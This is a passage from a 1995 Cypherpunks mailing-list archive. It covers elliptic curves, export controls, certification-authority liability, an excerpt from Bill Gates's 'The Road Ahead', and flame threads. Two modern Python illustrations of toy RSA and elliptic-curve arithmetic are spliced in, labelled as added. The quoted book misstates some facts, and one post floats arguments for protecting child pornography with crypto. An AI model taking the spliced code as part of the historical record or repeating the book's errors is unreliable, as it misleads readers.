slower than using integers, for comparable security.

That the numbers required have many more bits.

That the numbers required have somewhat less bits.

That elliptic curves are about the same, but the programs 
are a lot nastier.

Can someone tell me the true story?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Sat, 25 Nov 1995 08:25:13 +0800
To: cypherpunks@toad.com
Subject: Re: "lack" of export control rules
In-Reply-To: <Pine.BSD.3.91.951124054104.12402A-100000@usr4.primenet.com>
Message-ID: <199511250017.NAA16018@paramount.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am attila and I say ...
> On Thu, 23 Nov 1995, sameer wrote:
>  a> The feds have never established a general policy.
> 
>     in other words, business as usual with the Feds. If there is no "book"
> on what is or is not legal v/v ITAR, and the agency responsible will not
> communicate, it empirically says:  "...well, be reasonable to meet the
> intent of the law, but we will not tell you what is really expected;
> however, if, in the future, we decide what we really want, we will bust
> you if you did not fully comply despite your good intentions --and, if
> that does not fly, we'll charge you with conspiracy...." 

Just had an idea for Netscape's case.  If we suppose that the ITAR
governors ever managed to agree on a purely electronic based, export
controlled distribution method then Netscape can write a Java applet
or LiveScript to perform the task.  This would mean a *click here to
download* interface and bypass the obfuscated process that dogs MIT
pgp.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 26 Nov 1995 04:19:58 +0800
To: jis@mit.edu (Jeffrey I. Schiller)
Subject: Re: PGP Distribution Site at MIT *DOWN*
Message-ID: <199511252011.NAA01255@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat Nov 25th, 1995:
>We apologize for the inconvenience and hope to have full service
>restored shortly.
>                               -Jeff

Can you PLEASE put the .org permissions back in it!
Thanks ever so much. censored.org can't get in.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLd3ZorpjEWs1wBlAQHQXQP9EzvOuKxWs3f1gLPbhmUC7BMJcHLR8Dfz
jeU0AyGsxp9KWvfeut2nNzbSYsAgzLGUwmoQcU66t8iJPCXVW/mCORo5R1tExi+p
RFlPrhyfJyDxJfNT/RzRlrQT6KDj5U4AizIliaGdVh3KVHUmOiUNxX/4FAUQTKpl
c+kEefbMElI=
=9Y9F
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 26 Nov 1995 04:33:08 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Perry E. Metzger wrote:

> Hmmm. If someone is willing to find out what is needed to become a
> C.A. and to run one, and it turns out not to be particularly onerous,
> I or one of my corporate alter egos might be willing. I must say,
> though, that being an anti-fan of X.509 the situation would be ironic...
> 
> Perry

Well, from Netscape's perspective as far as I know you need nothing. Basically
when the browser finds a new CA that it does know about it prompts
the user and through a series of dialog boxes the user chooses to trust
it or not. (Well that is theory, and what Netscape release notes say, since
I don't have access to an SSL server right now, and would need to figure
out how to make my own certificate, I haven't tried it).

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 26 Nov 1995 08:11:01 +0800
To: Cypherpunks@toad.com
Subject: PGP Distribution Site at MIT *DOWN*
Message-ID: <acdd1d160002100417e5@[18.72.0.238]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The anonymous FTP server running on net-dist.mit.edu (which is also
bitsy.mit.edu) is currently down due to a failure of the disk drive
that hosts the files. We expect to replace the disk this afternoon
(Saturday) and begin restoral operational as soon as the new disk
is cabled up.

We apologize for the inconvenience and hope to have full service
restored shortly.

                                 -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLdruMUtR20Nv5BtAQELyAP/ekj4hTskW7rEqW5lTidmE67yjqxDWlj0
ahCYBpGOHyE6SRmoCNpjAyHkTu0As1rfdcyZOziDdlHkYWgyxPu3yjrQ9J5yvpM7
V+Q2EWSHHePjlXx9oyHa6FwkgwUkwTAQpuZBC9fu9Jp0HxPs7a6JC+6WSAJi342J
EDGnqFtxTp8=
=+MsK
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 26 Nov 1995 07:50:13 +0800
To: cypherpunks@toad.com
Subject: Learning Elliptic Curves
Message-ID: <acdc748500021004e06b@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I have found an easy introduction to elliptic curves. It is "Rational
Points on Elliptic Curves" by Joseph H. Silverman & John Tate.
(Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy
undergraduate introduction. It emphasizes the mathematical elegance. It
mentions crypto applications but does not delve deeply.

Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J.
Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has
only a very compressed theory section which already requires knowledge of
field theory. I think that the first book is a good intro to the second,
which does cover crypto applications.

What I learned is that elliptic curves are an alternative to finite fields
for crypto purposes. Here is what they have in common:
There are many (2^70 -- 2^2000) values any one of which can be represented
in the machine in constant space. a_i is the ith one of these values. If
someone sends you a_i it is real hard to figure out what i is. There is an
operation that isn't too expensive for computing a_(i+j) given a_i and a_j.
For some big integer i you can compute a_i in about (log i)^3 steps. For
RSA, knowing how to do these two computations does not reveal what the
period of the sequence is, i.e. what is the first i such that a_0 = a_i.
Knowing the period is tantamount to knowing the private key.
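
The shared structure described above, as an added example that is not part of the original post: one double-and-add routine serves both a finite-field group and an elliptic-curve group. The toy parameters (the field F_23 with base 5, and the curve y^2 = x^3 + 2x + 2 over F_17 with base point (5, 1)) are assumptions chosen here so that the period and the index i can be brute-forced, which is exactly what real sizes prevent.

```python
# Added illustration; toy parameters are assumptions, not from the post.
# Both settings give a sequence a_0, a_1, a_2, ... with a cheap rule for
# computing a_(i+j) from a_i and a_j.

# --- Setting 1: multiplicative group of the finite field F_23 ---
FP = 23
FG = 5                  # a_1; 5 generates all 22 nonzero residues mod 23
F_IDENTITY = 1          # a_0


def f_combine(x, y):
    """a_(i+j) from a_i and a_j: multiply modulo the prime."""
    return x * y % FP


# --- Setting 2: the curve y^2 = x^3 + 2x + 2 over F_17 ---
EP, EA = 17, 2
EG = (5, 1)             # a_1; a point of prime order 19
E_IDENTITY = None       # a_0, the point at infinity


def e_combine(p1, p2):
    """a_(i+j) from a_i and a_j: chord-and-tangent point addition."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % EP == 0:
        return None                      # P + (-P) = point at infinity
    if p1 == p2:                         # tangent slope (doubling)
        s = (3 * x1 * x1 + EA) * pow(2 * y1 % EP, -1, EP) % EP
    else:                                # chord slope (distinct points)
        s = (y2 - y1) * pow((x2 - x1) % EP, -1, EP) % EP
    x3 = (s * s - x1 - x2) % EP
    y3 = (s * (x1 - x3) - y1) % EP
    return (x3, y3)


def nth(i, base, combine, identity):
    """Compute a_i with about 2*log2(i) combine steps (double-and-add)."""
    result, addend = identity, base
    while i:
        if i & 1:
            result = combine(result, addend)
        addend = combine(addend, addend)
        i >>= 1
    return result


def period(base, combine, identity):
    """First i > 0 with a_i == a_0. Brute force: toy sizes only."""
    i, cur = 1, base
    while cur != identity:
        cur = combine(cur, base)
        i += 1
    return i


def index_of(target, base, combine, identity):
    """Recover i from a_i by walking the sequence. Toy sizes only."""
    i, cur = 0, identity
    while cur != target:
        cur = combine(cur, base)
        i += 1
        if cur == identity:
            raise ValueError("target is not in the sequence")
    return i


if __name__ == "__main__":
    for name, base, comb, ident in (
        ("F_23*", FG, f_combine, F_IDENTITY),
        ("E(F_17)", EG, e_combine, E_IDENTITY),
    ):
        a7 = nth(7, base, comb, ident)
        a9 = nth(9, base, comb, ident)
        print(name, "a_7 =", a7, "a_9 =", a9,
              "a_16 =", comb(a7, a9),
              "period =", period(base, comb, ident),
              "index of a_7 =", index_of(a7, base, comb, ident))
```
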






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 26 Nov 1995 04:29:09 +0800
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <m0tJPeV-0002eCC@horten>
Message-ID: <Pine.SUN.3.91.951125150446.848J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alas, certain critical social steps have been elided in the proposed 
protocol.  As it happens, I'm working on an article, to be published in 
the Oregon Law Review next year, on "The Importance of Trusted Third 
Parties in Electronic Commerce".  It's mostly about the care and feeding 
(and legal liability!) of a CA.  Unfortunately for this discussion, I'm 
only part way through my thinking about what the liability of a CA might 
be so I don't have carefully considered conclusions to offer you.  Try me 
again in a few weeks.

In the absence of legislation...

[PLUG:  if you haven't already done so, RUSH to my homepage

http://www.law.miami.edu/~froomkin

and click on the link to the ABA draft of the digital signature 
guidelines.  This mis-named document is actually all about CA liability.  
Comment period now extended to mid-January.]

...you need to worry about who might *use* the certificates, and what they
might do to the CA in the case of mis-certification or other misfortune. 
At the very least, there is a tort claim for "negligent
mis-representation" the first time an inaccurate certificate, or an
accurate certificate referencing a compromised key, is used in a
transaction that goes sour. 

I don't give legal advice on line, ever, so I can't tell you how to avoid
liability. I'm not even sure that this is possible absent legislation.  I
can, however, mention techniques that at this writing seem to me to be an
essential part of any liability-reduction strategy, without any claim that
these alone suffice to protect you to the level that I would want to be
protected (I'm a cautious guy). 
  
Repeat: I do claim that pending further thought these steps seem necessary, 
**not** that they are sufficient:

A) Establish a clear certification policy document, describing in detail 
what checks are made before issuing a certificate, how quickly CRLs are 
posted, and where.  This doesn't mean onerous checks are necessary, just 
that you need to be clear as to what checking a certificate from you 
embodies.  Publish this document.

B) Reference this policy document in every certificate.

C) Don't settle for less than X.509 ver 3, because this allows the 
certificate to carry within it a reference to the location of the CRL 
list.  Use that feature.

D) Establish a very reliable mechanism to ensure CRLs are posted where 
and when they should be.

E) Use a secure, trusted, computer system.

Again, I note that this is NOT a complete list of what you need to do. 
For more inspiration consult the ABA document referenced above. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 26 Nov 1995 05:48:21 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <199511252135.PAA01435@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Basically when the browser finds a new CA that it does know about it prompts
> the user and through a series of dialog boxes the user chooses to trust it
> or not. 

Is anyone running an ssl web server that would let us see how this works?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 26 Nov 1995 05:09:38 +0800
To: froomkin@law.miami.edu (Michael Froomkin)
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125150446.848J-100000@viper.law.miami.edu>
Message-ID: <199511252105.QAA08724@homeport.org>
MIME-Version: 1.0
Content-Type: text



| C) Don't settle for less than X.509 ver 3, because this allows the 
| certificate to carry within it a reference to the location of the CRL 
| list.  Use that feature.

	Does X.509 version 3 fix the problem that Ross Anderson points
out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)

	It's an excellent paper, well worth reading, but the basic
problem is that X.509 encrypts before signing.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 25 Nov 1995 23:15:25 +0800
To: cypherpunks@toad.com
Subject: Gates: Jiffy Iffy Crypto
Message-ID: <199511251506.QAA03450@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



From "The Road Ahead," by Bill Gates, with Nathan
Myhrvold and Peter Rinearson, Viking, 1995.


[Paths to the Highway, pp. 106-111]

Governments have long understood the importance of
keeping information private, for both economic and
military reasons. The need to make personal, commercial,
military, or diplomatic messages secure (or to break into
them) has attracted powerful intellects through the
generations. It is very satisfying to break an encoded
message. Charles Babbage, who made dramatic advances in
the art of code breaking in the mid-1800s, wrote:
"Deciphering is, in my opinion, one of the most
fascinating of arts, and I fear I have wasted upon it
more time than it deserves." I discovered its fascination
as a kid when, like kids everywhere, a bunch of us played
with simple ciphers. We would encode messages by
substituting one letter of the alphabet for another. If
a friend sent me a cipher that began "ULFW NZXX," it
would be fairly easy to guess that this represented "DEAR
BILL," and that U stood for D, and L for E, and so forth.
With those seven letters it wasn't hard to unravel the
rest of the cipher fairly quickly.

Past wars have been won or lost because the most powerful
governments on earth didn't have the cryptological power
any interested junior high school student with a personal
computer can harness today. Soon any child old enough to
use a computer will be able to transmit encoded messages
that no government on earth will find easy to decipher.
This is one of the profound implications of the spread of
fantastic computing power.

When you send a message across the information highway it
will be "signed" by your computer or other information
appliance with a digital signature that only you are
capable of applying, and it will be encrypted so that
only the intended recipient will be able to decipher it.
You'll send a message, which could be information of any
kind, including voice, video, or digital money. The
recipient will be able to be almost positive that the
message is really from you, that it was sent at exactly
the indicated time, that it has not been tampered with in
the slightest, and that others cannot decipher it.

The mechanism that will make this possible is based on
mathematical principles, including what are called
"one-way functions" and "public-key encryption." These
are quite advanced concepts, so I'm only going to touch
on them. Keep in mind that regardless of how complicated
the system is technically, it will be extremely easy for
you to use. You'll just tell your information appliance
what you want it to do and it will seem to happen
effortlessly.

A one-way function is something that is much easier to do
than undo. Breaking a pane of glass is a one-way
function, but not one useful for encoding. The sort of
one-way function required for cryptography is one that is
easy to undo if you know an extra piece of information
and very difficult to undo without that information.
There are a number of such one-way functions in
mathematics. One involves prime numbers. Kids learn about
prime numbers in school. A prime number cannot be divided
evenly by any number except 1 and itself. Among the first
dozen numbers, the primes are 2, 3, 5, 7, and 11. The
numbers 4, 6, 8, and 10 are not prime because 2 divides
into each of them evenly. The number 9 is not prime
because 3 divides into it evenly. There are an infinite
number of prime numbers, and there is no known pattern to
them except that they are prime. When you multiply two
prime numbers together, you get a number that can be
divided evenly only by those same two primes. For
example, only 5 and 7 can be divided evenly into 35.
Finding the primes is called "factoring" the number.

It is easy to multiply the prime numbers 11,927 and
20,903 and get the number 249,310,081, but it is much
harder to recover from the product, 249,310,081, the two
prime numbers that are its factors. This one-way
function, the difficulty of factoring numbers, underlies
an ingenious kind of cipher: the most sophisticated
encryption system in use today. It takes a long time for
even the largest computers to factor a really large
product back into its constituent primes. A coding system
based on factoring uses two different decoding keys, one
to encipher a message and a different but related one to
decipher. With only the enciphering key, it's easy to
encode a message, but deciphering it within any practical
period of time is nearly impossible. Deciphering requires
a separate key, available only to the intended recipient
of the message -- or, rather, to the recipient's
computer. The enciphering key is based on the product of
two huge prime numbers, whereas the deciphering key is
based on the primes themselves. A computer can generate
a new pair of unique keys in a flash, because it is easy
for a computer to generate two large prime numbers and
multiply them together. The enciphering key thus created
can be made public without appreciable risk, because of
the difficulty even another computer would have factoring
it to obtain the deciphering key.

The practical application of this encryption will be at
the center of the information highway's security system.
The world will become quite reliant on this network, so
it is important that security be handled competently. You
can think of the information highway as a postal network
where everyone has a mailbox that is impervious to
tampering and has an unbreakable lock. Each mailbox has
a slot that lets anyone slide information in, but only
the owner of a mailbox has the key to get information
out. (Some governments may insist that each mailbox have
a second door with a separate key that the government
keeps, but we'll ignore that political consideration for
now and concentrate on the security that software will
provide.)

Each user's computer or other information appliance will
use prime numbers to generate an enciphering key, which
will be listed publicly, and a corresponding deciphering
key, which only the user will know. This is how it will
work in practice: I have information I want to send you.
My information appliance/computer system looks up your
public key and uses it to encrypt the information before
sending it. No one can read the message, even though your
key is public knowledge, because your public key does not
contain the information needed for decryption. You
receive the message and your computer decrypts it with a
private key that corresponds to your public key.

You want to answer. Your computer looks up my public key
and uses it to encrypt your reply. No one else can read
the message, even though it was encrypted with a key that
is totally public. Only I can read it because only I have
the private deciphering key. This is very practical,
because no one has to trade keys in advance.

How big do the prime numbers and their products have to
be to ensure an effective one-way function?

The concept of public-key encryption was invented by
Whitfield Diffie and Martin Hellman in 1977. Another set
of computer scientists, Ron Rivest, Adi Shamir, and
Leonard Adleman, soon came up with the notion of using
prime factorization as part of what is now known as the
RSA cryptosystem, after the initials of their last names.
They projected that it would take millions of years to
factor a 130-digit number that was the product of two
primes, regardless of how much computing power was
brought to bear. To prove the point, they challenged the
world to find the two factors in this 129-digit number,
known to people in the field as RSA 129:

   114,381,625,757,888,867,669,235,779,976,146,612,010,
   218,296,721,242,362,562,561,842,935,706,935,245,733,
   897,830,597,123,563,958,705,058,989,075,147,599,290,
   026,879,543,541

They were sure that a message they had encrypted using
the number as the public key would be totally secure
forever. But they hadn't anticipated either the full
effects of Moore's Law, as discussed in chapter 2, which
has made computers much more powerful, or the success of
the personal computer, which has dramatically increased
the number of computers and computer users in the world.
In 1993 a group of more than 600 academics and hobbyists
from around the world began an assault on the 129-digit
number, using the Internet to coordinate the work of
various computers. In less than a year they factored the
number into two primes, one 64 digits long and the other
65. The primes are as follows:

   3,490,529,510,847,650,949,147,849,619,903,898,133,
   417,764,638,493,387,843,990,820,577

and

   32,769,132,993,266,709,549,961,988,190,834,461,413,
   177,642,967,992,942,539,798,288,533

And the encoded message says: "The magic words are
squeamish and ossifrage."

One lesson that came out of this challenge is that a
129-digit public key is not long enough if the
information being encrypted is really important and
sensitive. Another is that no one should get too cocksure
about the security of encryption.

Increasing the key just a few digits makes it much more
difficult to crack. Mathematicians today believe that a
250-digit-long product of two primes would take millions
of years to factor with any foreseeable amount of future
computing power. But who really knows? This uncertainty
-- and the unlikely but conceivable possibility that
someone could come up with an easy way of factoring big
numbers -- means that a software platform for the
information highway will have to be designed in such a
way that its encryption scheme can be changed readily.

One thing we don't have to worry about is running out of
prime numbers, or the prospect of two computers'
accidentally using the same numbers as keys. There are
far more prime numbers of appropriate length than there
are atoms in the universe, so the chance of an accidental
duplication is vanishingly small.

Key encryption allows more than just privacy. It can also
assure the authenticity of a document because a private
key can be used to encode a message that only the public
key can decode. It works like this: If I have information
I want to sign before sending it to you, my computer uses
my private key to encipher it. Now the message can be
read only if my public key -- which you and everyone else
knows -- is used to decipher it. This message is
verifiably from me, because no one else has the private
key that could have encrypted it in this way.

My computer takes this enciphered message and enciphers
it again, this time using your public key. Then it sends
this double-coded message to you across the information
highway.

Your computer receives the message and uses your private
key to decipher it. This removes the second level of
encoding but leaves the level I applied with my private
key. Then your computer uses my public key to decipher
the message again. Because it really is from me, the
message deciphers correctly and you know it is authentic.
If even one bit of information was changed, the message
would not decode properly and the tampering or
communications error would be apparent. This
extraordinary security will enable you to transact
business with strangers or even people you distrust,
because you'll be able to be sure that digital money is
valid and signatures and documents are provably
authentic.

Security can be increased further by having time stamps
incorporated into encrypted messages. If anyone tries to
tinker with the time that a document supposedly was
written or sent, the tinkering will be detectable. This
will rehabilitate the evidentiary value of photographs
and videos, which has been under assault because digital
retouching has become so easy to do.

My description of public-key encryption oversimplifies
the technical details of the system. For one thing,
because it is relatively slow, it will not be the only
form of encipherment used on the highway. But public-key
encryption will be the way that documents are signed,
authenticity is established, and the keys to other kinds
of encryption are distributed securely.


[Critical Issues, pp. 265-66, 270-71]

This versatility will be the strength of the network, but
it will also mean we will become reliant on it.

Reliance can be dangerous. During the New York City
blackouts in 1965 and 1977, millions of people were in
trouble -- at least for a few hours -- because of their
dependence on electricity. They counted on electric power
for light, heat, transport, and security. When
electricity failed, people were trapped in elevators,
traffic lights stopped working, and electric water pumps
quit. Anything really useful is missed when you lose it.

A complete failure of the information highway is worth
worrying about. Because the system will be thoroughly
decentralized, any single outage is unlikely to have a
widespread effect. If an individual server fails, it will
be replaced and its data restored. But the system could
be susceptible to assault. As the system becomes more
important, we will have to design in more redundancy. One
area of vulnerability is the system's reliance on
cryptography -- the mathematical locks that keep
information safe.

None of the protection systems that exist today, whether
steering-wheel locks or steel vaults, are completely
fail-safe. The best we can do is make it as difficult as
possible for somebody to break in. Despite popular
opinions to the contrary, computer security has a very
good record. Computers are capable of protecting
information in such a way that even the smartest hackers
can't get at it readily unless someone entrusted with
information makes a mistake. Sloppiness is the main
reason computer security gets breached. On the
information highway there will be mistakes, and too much
information will get passed along. Someone will issue
digital concert tickets that prove to be forgeable, and
too many people will show up. Whenever this sort of thing
happens, the system will have to be reworked and laws may
have to be revised.

Because both the system's privacy and the security of
digital money depend on encryption, a breakthrough in
mathematics or computer science that defeats the
cryptographic system could be a disaster. The obvious
mathematical breakthrough would be development of an easy
way to factor large prime numbers. Any person or
organization possessing this power could counterfeit
money, penetrate any personal, corporate, or governmental
file, and possibly even undermine the security of
nations, which is why we have to be so careful in
designing the system. We have to ensure that if any
particular encryption technique proves fallible, there is
a way to make an immediate transition to an alternate
technique. There's a little bit of inventing still to be
done before we have that perfected. It is particularly
hard to guarantee security for information you want kept
private for a decade or more.

[Good section on privacy protection elided]

At the same time technology is making it easier to create
video records, it is also making it possible to keep all
your personal documents and messages totally private.
Encryption-technology software, which anyone can download
from the Internet, can transform a PC into a virtually
unbreakable code machine. As the highway is deployed,
security services will be applied to all forms of digital
information -- phone calls, files, databases, you name
it. As long as you protect the password, the information
stored on your computer can be held under the strongest
lock and key that has ever existed. This allows for the
greatest degree of information privacy any individual has
ever had.

Many in government are opposed to this encryption
capability, because it reduces their ability to gather
information. Unfortunately for them, the technology can't
be stopped. The National Security Agency is a part of the
U.S. government defense and intelligence community that
protects this country's secret communications and
decrypts foreign communications to gather intelligence
data. The NSA does not want software containing advanced
encryption capabilities to be sent outside the United
States. However, this software is already available
throughout the world, and any computer can run it. No
policy decision will be able to restore the tapping
capabilities governments had in the past.

Today's legislation that prevents the export of software
with good encryption capability could harm U.S. software
and hardware companies. The restrictions give foreign
companies an advantage over U.S. competitors. American
companies almost unanimously agree that the current
encryption export restrictions don't work.

-----
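
The factoring asymmetry and the sign-then-encipher layering described in the excerpt, as an added example that is not from the book or the original post. It uses textbook RSA on the excerpt's primes 11,927 and 20,903; the public exponent 65537 and the recipient's primes are assumptions made here, and the scheme has no hashing or padding, which any deployed system requires.

```python
# Added illustration: textbook RSA at toy size, for study only.
from math import gcd, isqrt

P, Q = 11927, 20903      # the two primes quoted in the excerpt
N = P * Q                # 249,310,081: a single multiplication
E = 65537                # assumed public exponent (not from the excerpt)

# Constructed key material for the recipient (not from the excerpt).
RP, RQ = 104729, 1299709
RN = RP * RQ


def factor_by_trial_division(n):
    """Return (p, q, divisions_tried) for an odd product of two primes."""
    tried = 0
    for cand in range(3, isqrt(n) + 1, 2):
        tried += 1
        if n % cand == 0:
            return cand, n // cand, tried
    raise ValueError("no odd factor found")


def private_exponent(p, q, e=E):
    """Whoever knows the primes can compute the deciphering key."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    return pow(e, -1, phi)   # modular inverse, Python 3.8+


SENDER_D = private_exponent(P, Q)
RCPT_D = private_exponent(RP, RQ)


def sign_then_encrypt(m, sender_d, sender_n, rcpt_e, rcpt_n):
    """Encipher with the sender's private key, then the recipient's public key."""
    if not 0 <= m < sender_n < rcpt_n:
        raise ValueError("need 0 <= m < sender_n < rcpt_n for the layering")
    signed = pow(m, sender_d, sender_n)
    return pow(signed, rcpt_e, rcpt_n)


def decrypt_then_verify(c, rcpt_d, rcpt_n, sender_e, sender_n):
    """Remove the outer layer with the private key, the inner with the public."""
    signed = pow(c, rcpt_d, rcpt_n)
    if signed >= sender_n:
        raise ValueError("inner value is not a valid signature for this key")
    return pow(signed, sender_e, sender_n)


def demo():
    """Round-trip a three-byte message through both layers."""
    m = int.from_bytes(b"Hi!", "big")
    c = sign_then_encrypt(m, SENDER_D, N, E, RN)
    out = decrypt_then_verify(c, RCPT_D, RN, E, N)
    return out.to_bytes(3, "big")


def attacker_recovers_key(n, e=E):
    """At toy size the public modulus gives up the private exponent."""
    p, q, tried = factor_by_trial_division(n)
    return private_exponent(p, q, e), tried


if __name__ == "__main__":
    print("N =", N)
    d, tried = attacker_recovers_key(N)
    print("private exponent recovered after", tried, "trial divisions:",
          d == SENDER_D)
    print("round trip:", demo())
```
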












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 25 Nov 1995 13:26:25 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <199511250514.QAA13966@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
  and moroni@scranton.com
  and cypherpunks@toad.com

Allen wrote:
> From: IN%"moroni@scranton.com"  "Moroni" 24-NOV-1995 14:52:11.13
> 
> >I wish we could get off the subject of the kiddie porn , it makes
> >me wonder what people on this list are doing when they are not
...

I believe that the thread originally was on pornography in  
general, not any particulary type...

One reason to talk of it might be that users of legitimate pornography
(non-violent erotica, X, whatever you call it) are a likely adopter
of privacy technology (encryption, e cash, anon, etc).

They may also be a sufficiently numerous group to affect elections,
should one or the other party actually be better than the other.

Particularly in Australia, where I understand X-rated material
may be sold only in the Territories, and anyone living in one of
the States has to drive over or mail-order.

<offtopic>
...
> governmental censorship. Consequently, I would like to give two
> counterarguments to the idea that child pornography is not
> something that should be cryptographically protected.
... [age of consent; generated without children] ...

One can even imagine situations with real live child pornography...
Should one be forbidden from distributing pictures of oneself
when one was younger? 
</offtopic>

However, I speak from assumptions and newspaper reports, not
personal experience, so all of the above may be way off :-)

Adiau - Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLamJSxV6mvvBgf5AQGuagQAhGbN/16ALjnDKKJMlPpfbctBkXt7gpZl
zh+lx+w+u0jIYG6whmCwpPnSPpo1MjorHvhZ/5B/h+WonXYfSw+ZFo0ziOCtIh5S
L0Jyp2LnJaU4mqggVwqMfBVlQ31Ax3sSuxxxI2YhQygrx4BauPhHMnJJnDxs7Uj0
qKFVGTK53WI=
=m8px
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sun, 26 Nov 1995 08:22:08 +0800
To: cypherpunks@toad.com
Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy
Message-ID: <m0tJUWY-0008yoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


The detweiler tentacle is afraid to debate me...


>To: "Vladimir Z. Nuri" <vznuri@netcom.com>
>From: jimbell@pacifier.com (jim bell)
>Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
>
>>well, I don't really care about convincing anarchists that you're
>>a bozo. it's reasonable people who it would scare me if they began
>>to take you seriously.
>
>Then start being "scared."  I guess you have lots of practice.
>
>> frankly I'm not convinced that anyone with
>>half a brain is taking you seriously.
>
>I don't have to convince you of anything!  You wimped out!  You claimed
>that you would be happy to debate me IN PUBLIC!  Well, I did and you ran
>away with your tail between your legs!
>
>Stop being a wuss!  If you're as correct as you claim you are, you have no
>reason to fear.  Debate, dammit!
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
